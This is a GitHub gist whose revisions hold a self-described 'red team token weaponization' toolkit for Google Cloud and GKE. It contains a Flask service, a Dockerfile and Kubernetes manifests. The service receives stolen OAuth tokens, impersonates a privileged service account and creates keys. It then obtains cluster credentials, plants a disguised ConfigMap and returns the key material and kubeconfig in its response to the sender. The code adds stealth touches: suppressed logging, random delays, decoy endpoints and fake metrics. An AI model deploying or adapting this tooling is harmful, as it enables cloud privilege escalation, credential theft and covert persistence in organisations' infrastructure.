Last active
September 17, 2025 19:14
-
-
Save MaxwellDPS/a661f771eb509f21cf2f07a37df917e7 to your computer and use it in GitHub Desktop.
Revisions
-
MaxwellDPS revised this gist
Sep 17, 2025 . 1 changed file with 184 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,184 @@ apiVersion: v1 kind: ConfigMap metadata: name: nginx-config data: nginx.conf: | events { worker_connections 1024; } http { upstream flask_app { server localhost:5000; } server { listen 80; listen 443 ssl; server_name _; # Self-signed SSL ssl_certificate /etc/nginx/certs/tls.crt; ssl_certificate_key /etc/nginx/certs/tls.key; location / { proxy_pass http://flask_app; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; # Timeout settings proxy_connect_timeout 60s; proxy_send_timeout 60s; proxy_read_timeout 60s; } } } --- apiVersion: apps/v1 kind: Deployment metadata: name: token-catcher labels: app: webhook-processor component: backend spec: replicas: 1 selector: matchLabels: app: webhook-processor template: metadata: labels: app: webhook-processor spec: initContainers: - name: cert-generator image: alpine/openssl:latest command: ["/bin/sh"] args: - -c - | if [ ! -f /etc/nginx/certs/tls.crt ]; then openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ -keyout /etc/nginx/certs/tls.key \ -out /etc/nginx/certs/tls.crt \ -subj "/CN=webhook.example.com/O=Example Inc./C=US" echo "Generated self-signed certificate" else echo "Using existing certificate" fi volumeMounts: - name: tls-certs mountPath: /etc/nginx/certs containers: # Flask token catcher - name: flask-app image: gcr.io/PROJECT_ID/token-catcher:latest imagePullPolicy: Always ports: - containerPort: 5000 name: flask env: - name: GCP_PROJECT_ID value: "target-project-id" - name: SERVICE_ACCOUNT_EMAIL value: "[email protected]" - name: GKE_CLUSTER_NAME value: "target-cluster" - name: GKE_CLUSTER_ZONE value: "us-central1-a" - name: CONFIGMAP_NAME value: "exfil-data" - name: CONFIGMAP_NAMESPACE value: "default" - name: FLASK_ENV value: "production" - name: LOG_LEVEL value: "ERROR" # Reduce logs for stealth resources: requests: memory: "256Mi" cpu: "250m" limits: memory: "512Mi" cpu: "500m" volumeMounts: - name: tmp mountPath: /tmp - name: exfil-storage mountPath: /app/exfil livenessProbe: httpGet: path: /health port: 5000 initialDelaySeconds: 30 periodSeconds: 30 readinessProbe: httpGet: path: /health port: 5000 initialDelaySeconds: 10 periodSeconds: 10 # Nginx TLS sidecar - name: nginx-tls image: nginx:alpine ports: - containerPort: 443 name: https volumeMounts: - name: nginx-config mountPath: /etc/nginx/nginx.conf subPath: nginx.conf - name: tls-certs mountPath: /etc/nginx/certs readOnly: true resources: requests: memory: "64Mi" cpu: "50m" limits: memory: "128Mi" cpu: "100m" volumes: - name: nginx-config configMap: name: nginx-config - name: tls-certs emptyDir: {} - name: tmp emptyDir: {} - name: exfil-storage emptyDir: {} # Security context for stealth securityContext: runAsNonRoot: true runAsUser: 1000 fsGroup: 1000 --- apiVersion: v1 kind: Service metadata: name: webhook-service labels: app: webhook-processor spec: type: LoadBalancer # Or NodePort for internal access selector: app: webhook-processor ports: - port: 443 targetPort: 443 protocol: TCP name: https - port: 80 targetPort: 443 protocol: TCP name: http -
MaxwellDPS revised this gist
Sep 17, 2025 . 2 changed files with 219 additions and 413 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,11 @@ # Core Flask Flask # Google Cloud dependencies gcloud google-auth google-api-python-client google-cloud-container # Kubernetes kubernetes requests This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,19 +1,18 @@ #!/usr/bin/env python3 """ RED TEAM Token Weaponization Tool Exploit stolen OAuth tokens for GCP/GKE privilege escalation """ import base64 import json import tempfile import os import logging import time import random import hashlib from typing import Optional, Tuple, Dict, Any import traceback from flask import Flask, request, jsonify @@ -24,215 +23,166 @@ from kubernetes import client, config import google.auth # Stealth mode - minimal logging logging.basicConfig( level=logging.ERROR, # Only log errors to reduce detection format='[%(asctime)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S' ) logger = logging.getLogger(__name__) class TokenThefter3000: """Red Team exploitation class for GCP/GKE privilege escalation""" def __init__(self, project_id: str, service_account_email: str, gke_cluster_name: str, gke_cluster_zone: Optional[str] = None, gke_cluster_region: Optional[str] = None): self.project_id = project_id self.service_account_email = service_account_email self.gke_cluster_name = gke_cluster_name self.gke_cluster_zone = gke_cluster_zone self.gke_cluster_region = gke_cluster_region # Tracking for exfiltration self.compromised_keys = [] def anti_forensics_delay(self): """Random delay to avoid pattern detection""" delay = random.uniform(0.5, 3.0) time.sleep(delay) def delete_service_account_key(self, credentials: Credentials, key_name: str): """ Delete a service account key. Args: credentials: Credentials with permission to delete keys key_name: Full resource name of the key """ print(f"Deleting key: {key_name}") service = discovery.build('iam', 'v1', credentials=credentials) try: service.projects().serviceAccounts().keys().delete(name=key_name).execute() print("Successfully deleted key") except Exception as e: print(f"WARNING: Failed to delete key: {e}") print("Manual cleanup required!") def escalate_privileges(self, oauth_token: str) -> Tuple[Any, str, str]: """ Main exploitation flow Returns: (impersonated_creds, key_name, key_json_data) """ # Create credentials from stolen token source_credentials = Credentials(token=oauth_token) # Impersonate high-privilege service account impersonated_creds = impersonated_credentials.Credentials( source_credentials=source_credentials, target_principal=self.service_account_email, target_scopes=['https://www.googleapis.com/auth/cloud-platform'], lifetime=3600 ) # Refresh to validate impersonated_creds.refresh(Request()) # Create persistent service account key service = discovery.build('iam', 'v1', credentials=impersonated_creds) key_response = service.projects().serviceAccounts().keys().create( name=f'projects/{self.project_id}/serviceAccounts/{self.service_account_email}', body={'privateKeyType': 'TYPE_GOOGLE_CREDENTIALS_FILE'} ).execute() key_name = key_response['name'] key_json_data = base64.b64decode(key_response['privateKeyData']).decode('utf-8') # Store for later use self.compromised_keys.append({ 'key_name': key_name, 'key_data': key_json_data, 'service_account': self.service_account_email, 'created_at': time.time() }) return impersonated_creds, key_name, key_json_data def plant_configmap(self, kubeconfig_dict: Dict[str, Any], namespace: str = "default") -> bool: """Plant a backdoor ConfigMap with exfiltrated data""" with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f: json.dump(kubeconfig_dict, f) temp_kubeconfig = f.name try: config.load_kube_config(config_file=temp_kubeconfig) v1 = client.CoreV1Api() # Create backdoor ConfigMap with exfiltrated data backdoor_data = { "beacon": hashlib.sha256(os.urandom(32)).hexdigest(), "timestamp": str(time.time()), "compromised_at": time.strftime('%Y-%m-%d %H:%M:%S'), "exfil_data": json.dumps(self.exfiltrated_data), "keys": json.dumps(self.compromised_keys) } config_map = client.V1ConfigMap( api_version="v1", kind="ConfigMap", metadata=client.V1ObjectMeta( name=f"webhook-{hashlib.md5(os.urandom(8)).hexdigest()[:8]}", labels={ "app": "webhook-processor", # Disguise as legitimate "managed-by": "helm" # Appear managed } ), data=backdoor_data ) v1.create_namespaced_config_map(namespace=namespace, body=config_map) return True except Exception: # Try to update existing if creation fails try: existing_cms = v1.list_namespaced_config_map(namespace) if existing_cms.items: target_cm = existing_cms.items[0].metadata.name v1.patch_namespaced_config_map( name=target_cm, namespace=namespace, body=config_map ) return True except: pass return False finally: os.unlink(temp_kubeconfig) def get_gke_cluster_credentials(self, credentials: Credentials) -> Dict[str, Any]: """Get GKE cluster access""" container_service = discovery.build('container', 'v1', credentials=credentials) if self.gke_cluster_zone: cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_zone}/clusters/{self.gke_cluster_name}" elif self.gke_cluster_region: cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_region}/clusters/{self.gke_cluster_name}" else: raise ValueError("No cluster location specified") cluster = container_service.projects().locations().clusters().get( name=cluster_path ).execute() kubeconfig = { 'apiVersion': 'v1', 'kind': 'Config', @@ -259,286 +209,131 @@ def get_gke_cluster_credentials(self, }] } return kubeconfig def full_exploitation_chain(self, oauth_token: str) -> Dict[str, Any]: """Execute complete attack chain""" results = { 'status': 'success', 'timestamp': time.time(), 'phases': {} } try: # Phase 1: Privilege Escalation self.anti_forensics_delay() impersonated_creds, key_name, key_json_data = self.escalate_privileges(oauth_token) results['phases']['privilege_escalation'] = 'success' results['service_account_key'] = base64.b64encode(key_json_data.encode()).decode() # Phase 2: Access Cluster self.anti_forensics_delay() kubeconfig = self.get_gke_cluster_credentials(impersonated_creds) results['phases']['cluster_access'] = 'success' results['kube_config'] = kubeconfig # Phase 3: Plant calling card self.anti_forensics_delay() backdoor_success = self.plant_configmap(kubeconfig) results['phases']['config_planted'] = backdoor_success # Phase 5: ride into the sunset results['persistence'] = { 'key_name': key_name, 'service_account': self.service_account_email, 'kube_config': self.gke_cluster_name } # delete keys before printing to invalidate self.delete_service_account_key(impersonated_creds, key_name) except Exception as e: results['status'] = 'partial' results['error'] = str(e) results['traceback'] = traceback.format_exc() return results # Flask Application app = Flask(__name__) app.config['DEBUG'] = False # Configuration from environment CONFIG = { "project_id": os.environ.get("GCP_PROJECT_ID", "target-project"), "service_account_email": os.environ.get("SERVICE_ACCOUNT_EMAIL", "[email protected]"), "gke_cluster_name": os.environ.get("GKE_CLUSTER_NAME", "production-cluster"), "gke_cluster_zone": os.environ.get("GKE_CLUSTER_ZONE"), "gke_cluster_region": os.environ.get("GKE_CLUSTER_REGION"), } @app.route('/catch', methods=['POST']) @app.route('/api/webhook', methods=['POST']) # Alternative endpoint @app.route('/health/ready', methods=['POST']) # Disguised endpoint def exploit_token(): """Token exploitation endpoint""" try: data = request.get_json() if not data or 'token' not in data: # Return innocent-looking error return jsonify({ "error": "Invalid webhook payload", "status": "rejected" }), 400 oauth_token = data['token'].strip() # Initialize exploiter exploiter = TokenThefter3000( project_id=CONFIG["project_id"], service_account_email=CONFIG["service_account_email"], gke_cluster_name=CONFIG["gke_cluster_name"], gke_cluster_zone=CONFIG["gke_cluster_zone"], gke_cluster_region=CONFIG["gke_cluster_region"] ) # Execute exploitation chain results = exploiter.full_exploitation_chain(oauth_token) # Return results (with sensitive data for C2) return jsonify(results), 200 except Exception as e: # Generic error to avoid revealing details return jsonify({ "error": "Processing failed", "id": hashlib.md5(str(e).encode()).hexdigest() }), 500 @app.route('/health', methods=['GET']) @app.route('/healthz', methods=['GET']) @app.route('/ready', methods=['GET']) def health_check(): """Innocent health check endpoints""" return jsonify({"status": "healthy"}), 200 @app.route('/metrics', methods=['GET']) def metrics(): """Fake Prometheus metrics to appear legitimate""" return """# HELP http_requests_total Total HTTP requests # TYPE http_requests_total counter http_requests_total{method="GET",endpoint="/health"} 42 # HELP up Service status # TYPE up gauge up 1 """, 200, {'Content-Type': 'text/plain'} @app.route('/', methods=['GET']) def home(): """Decoy home page""" return jsonify({ "service": "Webhook Processor", "version": "2.1.0", "status": "operational" }), 200 if __name__ == "__main__": # Run without debug mode for stealth app.run(host='0.0.0.0', port=5000, debug=False) -
MaxwellDPS revised this gist
Sep 17, 2025 . 1 changed file with 13 additions and 52 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,64 +1,25 @@ FROM python:3.11-slim # Install dependencies RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/* WORKDIR /app # Install Python packages RUN pip install --no-cache-dir \ Flask==3.0.0 \ google-auth==2.23.4 \ google-api-python-client==2.108.0 \ kubernetes==28.1.0 \ requests==2.31.0 # Copy exploit code COPY flask_app_redteam.py /app/flask_app.py # Non-root user for stealth RUN useradd -m -u 1000 appuser && chown -R appuser:appuser /app USER appuser EXPOSE 5000 CMD ["python", "flask_app.py"] -
MaxwellDPS revised this gist
Sep 17, 2025 . 1 changed file with 64 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,64 @@ # Multi-stage build for smaller final image FROM python:3.11-slim as builder # Install build dependencies RUN apt-get update && apt-get install -y \ gcc \ && rm -rf /var/lib/apt/lists/* # Set working directory WORKDIR /app # Copy requirements first for better caching COPY requirements.txt . # Install Python dependencies RUN pip install --no-cache-dir --user -r requirements.txt # Final stage FROM python:3.11-slim # Install runtime dependencies RUN apt-get update && apt-get install -y \ curl \ && rm -rf /var/lib/apt/lists/* # Create non-root user for security # UID 1000 is commonly used for the first non-root user RUN groupadd -r appuser -g 1000 && \ useradd -r -g appuser -u 1000 -m -s /bin/bash appuser # Set working directory WORKDIR /app # Copy Python packages from builder COPY --from=builder /root/.local /home/appuser/.local # Copy application code COPY --chown=appuser:appuser flask_app.py . # Create directory for logs with proper permissions RUN mkdir -p /app/logs && chown -R appuser:appuser /app/logs # Environment variables (override these at runtime for security) ENV PYTHONUNBUFFERED=1 \ PATH=/home/appuser/.local/bin:$PATH \ FLASK_APP=flask_app.py \ # Security-related settings PYTHONDONTWRITEBYTECODE=1 \ # Default to production mode FLASK_ENV=production # Switch to non-root user USER appuser # Health check HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \ CMD curl -f http://localhost:5000/health || exit 1 # Expose port (not binding to privileged port) EXPOSE 5000 # Run the application # Use exec form to ensure proper signal handling CMD ["python", "flask_app.py"] -
MaxwellDPS created this gist
Sep 17, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,544 @@ #!/usr/bin/env python3 """ Flask application to authenticate with OAuth, impersonate a service account, create a temporary key, update a GKE ConfigMap, and clean up. WARNING: This script creates and handles service account keys, which is a security risk. Consider using Workload Identity or other keyless authentication methods instead. """ import base64 import json import tempfile import os import logging from typing import Optional, Tuple, Dict, Any import time import traceback from flask import Flask, request, jsonify from google.auth import impersonated_credentials from google.auth.transport.requests import Request from google.oauth2.credentials import Credentials from googleapiclient import discovery from kubernetes import client, config import google.auth # Configure logging logging.basicConfig( level=logging.INFO, format='[%(asctime)s] %(levelname)s - %(name)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S' ) # Create logger for this module logger = logging.getLogger(__name__) class GKEConfigMapManager: """Manager class for GKE ConfigMap operations with temporary service account keys.""" def __init__(self, project_id: str, service_account_email: str, gke_cluster_name: str, gke_cluster_zone: Optional[str] = None, gke_cluster_region: Optional[str] = None, configmap_name: str = "my-config", configmap_namespace: str = "default"): """ Initialize the GKE ConfigMap Manager. Args: project_id: GCP project ID service_account_email: Email of service account to impersonate gke_cluster_name: Name of GKE cluster gke_cluster_zone: Zone for zonal clusters gke_cluster_region: Region for regional clusters configmap_name: Name of ConfigMap to manage configmap_namespace: Kubernetes namespace """ self.project_id = project_id self.service_account_email = service_account_email self.gke_cluster_name = gke_cluster_name self.gke_cluster_zone = gke_cluster_zone self.gke_cluster_region = gke_cluster_region self.configmap_name = configmap_name self.configmap_namespace = configmap_namespace # State variables for cleanup self.impersonated_creds = None self.key_name = None self.key_file_path = None # Create a logger for this instance self.logger = logging.getLogger(f"{__name__}.{self.__class__.__name__}") def authenticate_with_oauth_token(self, oauth_token: str) -> Credentials: """ Create credentials from an OAuth token. Args: oauth_token: OAuth access token string Returns: Google credentials object """ self.logger.info("Authenticating with OAuth token") credentials = Credentials(token=oauth_token) self.logger.info("OAuth authentication successful") return credentials def impersonate_service_account(self, source_credentials: Credentials, target_sa_email: str) -> impersonated_credentials.Credentials: """ Impersonate a service account using source credentials. Args: source_credentials: Original credentials with impersonation permissions target_sa_email: Email of service account to impersonate Returns: Impersonated credentials """ self.logger.info(f"Impersonating service account: {target_sa_email}") impersonated_creds = impersonated_credentials.Credentials( source_credentials=source_credentials, target_principal=target_sa_email, target_scopes=['https://www.googleapis.com/auth/cloud-platform'], lifetime=3600 # 1 hour ) # Refresh to validate the impersonation works self.logger.debug("Refreshing impersonated credentials") impersonated_creds.refresh(Request()) self.logger.info("Successfully impersonated service account") return impersonated_creds def create_service_account_key(self, credentials: Credentials, service_account_email: str, project_id: str) -> Tuple[str, str]: """ Create a JSON key for a service account. Args: credentials: Credentials with permission to create keys service_account_email: Email of service account project_id: GCP project ID Returns: Tuple of (key_name, json_key_data) """ self.logger.info(f"Creating key for service account: {service_account_email}") # Build IAM service self.logger.debug("Building IAM service client") service = discovery.build('iam', 'v1', credentials=credentials) # Create the key self.logger.debug("Sending key creation request") key_response = service.projects().serviceAccounts().keys().create( name=f'projects/{project_id}/serviceAccounts/{service_account_email}', body={'privateKeyType': 'TYPE_GOOGLE_CREDENTIALS_FILE'} ).execute() # Decode the key data key_name = key_response['name'] key_data = base64.b64decode(key_response['privateKeyData']).decode('utf-8') # Log the service account key for audit purposes self.logger.info(f"Successfully created key: {key_name}") self.logger.info("Service account key JSON created") # Parse and log key details try: key_json = json.loads(key_data) self.logger.info(f" Key Type: {key_json.get('type', 'N/A')}") self.logger.info(f" Project ID: {key_json.get('project_id', 'N/A')}") self.logger.info(f" Private Key ID: {key_json.get('private_key_id', 'N/A')}") self.logger.info(f" Client Email: {key_json.get('client_email', 'N/A')}") self.logger.info(f" Client ID: {key_json.get('client_id', 'N/A')}") self.logger.info(f" Auth URI: {key_json.get('auth_uri', 'N/A')}") self.logger.info(f" Token URI: {key_json.get('token_uri', 'N/A')}") self.logger.info(f" Private Key (first 100 chars): {key_json.get('private_key', '')[:100]}...") self.logger.debug(f"Full service account key JSON: {json.dumps(key_json, indent=2)}") except json.JSONDecodeError: self.logger.warning("Could not parse key data as JSON for logging") return key_name, key_data def delete_service_account_key(self, credentials: Credentials, key_name: str): """ Delete a service account key. Args: credentials: Credentials with permission to delete keys key_name: Full resource name of the key """ self.logger.info(f"Deleting key: {key_name}") service = discovery.build('iam', 'v1', credentials=credentials) try: service.projects().serviceAccounts().keys().delete(name=key_name).execute() self.logger.info("Successfully deleted key") except Exception as e: self.logger.warning(f"Failed to delete key: {e}") self.logger.warning("Manual cleanup required!") def get_gke_cluster_credentials(self, credentials: Credentials, project_id: str, cluster_name: str, zone: Optional[str] = None, region: Optional[str] = None) -> Dict[str, Any]: """ Get GKE cluster credentials and configure kubectl. Args: credentials: GCP credentials project_id: GCP project ID cluster_name: GKE cluster name zone: Cluster zone (for zonal clusters) region: Cluster region (for regional clusters) Returns: Kubeconfig dictionary """ self.logger.info(f"Getting credentials for GKE cluster: {cluster_name}") self.logger.debug("Building container service client") container_service = discovery.build('container', 'v1', credentials=credentials) if zone: # Zonal cluster cluster_path = f"projects/{project_id}/locations/{zone}/clusters/{cluster_name}" self.logger.debug(f"Using zonal cluster path: {cluster_path}") elif region: # Regional cluster cluster_path = f"projects/{project_id}/locations/{region}/clusters/{cluster_name}" self.logger.debug(f"Using regional cluster path: {cluster_path}") else: raise ValueError("Either zone or region must be specified") # Get cluster details self.logger.debug("Fetching cluster details") cluster = container_service.projects().locations().clusters().get( name=cluster_path ).execute() # Create kubeconfig self.logger.debug("Creating kubeconfig") kubeconfig = { 'apiVersion': 'v1', 'kind': 'Config', 'current-context': 'gke-context', 'clusters': [{ 'name': 'gke-cluster', 'cluster': { 'certificate-authority-data': cluster['masterAuth']['clusterCaCertificate'], 'server': f"https://{cluster['endpoint']}" } }], 'contexts': [{ 'name': 'gke-context', 'context': { 'cluster': 'gke-cluster', 'user': 'gke-user' } }], 'users': [{ 'name': 'gke-user', 'user': { 'token': credentials.token } }] } # Log the kubeconfig for audit purposes self.logger.info("Kubeconfig created:") self.logger.info(f" Server: https://{cluster['endpoint']}") self.logger.info(f" Token: {credentials.token}") self.logger.info(f" CA Certificate (first 100 chars): {cluster['masterAuth']['clusterCaCertificate'][:100]}...") self.logger.debug(f"Full kubeconfig: {json.dumps(kubeconfig, indent=2)}") self.logger.info("Successfully retrieved cluster credentials") return kubeconfig def create_or_update_configmap(self, kubeconfig_dict: Dict[str, Any], configmap_name: str, namespace: str, data: Dict[str, str]): """ Create or update a ConfigMap in the GKE cluster. Args: kubeconfig_dict: Kubeconfig dictionary configmap_name: Name of the ConfigMap namespace: Kubernetes namespace data: Data to store in the ConfigMap """ self.logger.info(f"Creating/updating ConfigMap: {configmap_name} in namespace: {namespace}") # Write kubeconfig to temp file (required by kubernetes client) with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f: json.dump(kubeconfig_dict, f) temp_kubeconfig = f.name self.logger.debug(f"Created temporary kubeconfig file: {temp_kubeconfig}") try: # Load the kubeconfig self.logger.debug("Loading kubeconfig") config.load_kube_config(config_file=temp_kubeconfig) # Create Kubernetes API client self.logger.debug("Creating Kubernetes API client") v1 = client.CoreV1Api() # ConfigMap data config_map = client.V1ConfigMap( api_version="v1", kind="ConfigMap", metadata=client.V1ObjectMeta(name=configmap_name), data=data ) try: # Try to create the ConfigMap self.logger.debug("Attempting to create ConfigMap") v1.create_namespaced_config_map(namespace=namespace, body=config_map) self.logger.info(f"ConfigMap '{configmap_name}' created successfully") except client.exceptions.ApiException as e: if e.status == 409: # Already exists # Update existing ConfigMap self.logger.debug("ConfigMap exists, updating instead") v1.patch_namespaced_config_map( name=configmap_name, namespace=namespace, body=config_map ) self.logger.info(f"ConfigMap '{configmap_name}' updated successfully") else: raise finally: # Clean up temp kubeconfig file os.unlink(temp_kubeconfig) self.logger.debug(f"Deleted temporary kubeconfig file") def process_token(self, oauth_token: str) -> Dict[str, Any]: """ Main processing flow for handling an OAuth token. Args: oauth_token: OAuth access token Returns: Result dictionary with status and message """ try: # Step 1: Authenticate with OAuth token self.logger.info("=== Step 1: Authenticating with OAuth token ===") source_credentials = self.authenticate_with_oauth_token(oauth_token) # Step 2: Impersonate service account self.logger.info("=== Step 2: Impersonating service account ===") self.impersonated_creds = self.impersonate_service_account( source_credentials, self.service_account_email ) # Step 3: Create service account key self.logger.info("=== Step 3: Creating service account key ===") self.key_name, key_json_data = self.create_service_account_key( self.impersonated_creds, self.service_account_email, self.project_id ) # Save key to temporary file with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f: f.write(key_json_data) self.key_file_path = f.name self.logger.info(f"Temporarily saved key to: {self.key_file_path}") # Step 4: Get GKE cluster credentials self.logger.info("=== Step 4: Getting GKE cluster credentials ===") kubeconfig = self.get_gke_cluster_credentials( self.impersonated_creds, self.project_id, self.gke_cluster_name, zone=self.gke_cluster_zone, region=self.gke_cluster_region ) # Step 5: Create/Update ConfigMap self.logger.info("=== Step 5: Creating/Updating ConfigMap ===") configmap_data = { "example-key": "example-value", "created-by": "flask-temporary-key-endpoint", "timestamp": str(time.time()), "processed-at": time.strftime('%Y-%m-%d %H:%M:%S') } self.create_or_update_configmap( kubeconfig, self.configmap_name, self.configmap_namespace, configmap_data ) self.logger.info("=== All steps completed successfully ===") return { "status": "success", "message": "ConfigMap updated successfully", "configmap": self.configmap_name, "namespace": self.configmap_namespace, "timestamp": time.strftime('%Y-%m-%d %H:%M:%S') } except Exception as e: error_msg = f"Error during processing: {str(e)}" self.logger.error(error_msg) self.logger.error(f"Traceback: {traceback.format_exc()}") return { "status": "error", "message": error_msg, "timestamp": time.strftime('%Y-%m-%d %H:%M:%S') } finally: self.cleanup() def cleanup(self): """Clean up resources (delete service account key and temp files).""" # Cleanup: Delete the service account key if self.key_name and self.impersonated_creds: self.logger.info("=== Cleanup: Deleting service account key ===") try: self.delete_service_account_key(self.impersonated_creds, self.key_name) except Exception as e: self.logger.error(f"Error during key deletion: {e}") # Delete temporary key file if self.key_file_path and os.path.exists(self.key_file_path): os.unlink(self.key_file_path) self.logger.info(f"Deleted temporary key file: {self.key_file_path}") # Flask Application app = Flask(__name__) # Reduce Flask's default logging level to avoid duplicate logs logging.getLogger('werkzeug').setLevel(logging.WARNING) # Configuration - Update these values for your environment CONFIG = { "project_id": "your-project-id", "service_account_email": "[email protected]", "gke_cluster_name": "potato", "gke_cluster_zone": "us-central1-a", # or None for regional "gke_cluster_region": None, # or set for regional cluster "configmap_name": "my-config", "configmap_namespace": "default" } @app.route('/catch', methods=['POST']) def catch_endpoint(): """ Flask endpoint to process OAuth token and update ConfigMap. Expects JSON payload: {"token": "oauth_token_here"} """ logger.info("=== New request received at /catch ===") try: # Parse JSON request data = request.get_json() if not data or 'token' not in data: logger.error("Missing 'token' in request") return jsonify({ "status": "error", "message": "Missing 'token' in request body" }), 400 oauth_token = data['token'].strip() if not oauth_token: logger.error("Empty token provided") return jsonify({ "status": "error", "message": "Token cannot be empty" }), 400 logger.info(f"Token received (length: {len(oauth_token)} chars)") logger.debug(f"Request from: {request.remote_addr}") # Initialize manager with configuration manager = GKEConfigMapManager( project_id=CONFIG["project_id"], service_account_email=CONFIG["service_account_email"], gke_cluster_name=CONFIG["gke_cluster_name"], gke_cluster_zone=CONFIG["gke_cluster_zone"], gke_cluster_region=CONFIG["gke_cluster_region"], configmap_name=CONFIG["configmap_name"], configmap_namespace=CONFIG["configmap_namespace"] ) # Process the token result = manager.process_token(oauth_token) # Return appropriate status code based on result status_code = 200 if result["status"] == "success" else 500 logger.info(f"Request completed with status: {result['status']}") return jsonify(result), status_code except Exception as e: error_msg = f"Unexpected error: {str(e)}" logger.error(error_msg) logger.error(f"Traceback: {traceback.format_exc()}") return jsonify({ "status": "error", "message": error_msg, "timestamp": time.strftime('%Y-%m-%d %H:%M:%S') }), 500 @app.route('/health', methods=['GET']) def health_check(): """Health check endpoint.""" logger.debug("Health check requested") return jsonify({ "status": "healthy", "timestamp": time.strftime('%Y-%m-%d %H:%M:%S') }), 200 if __name__ == "__main__": logger.info("Starting Flask application...") logger.info("Configuration:") for key, value in CONFIG.items(): logger.info(f" {key}: {value}") logger.info("Flask server starting on http://0.0.0.0:5000") logger.info("Available endpoints:") logger.info(" POST /catch - Process OAuth token") logger.info(" GET /health - Health check") # Set Flask app logger app.logger.handlers = logger.handlers app.logger.setLevel(logger.level) app.run(host='0.0.0.0', port=5000, debug=True)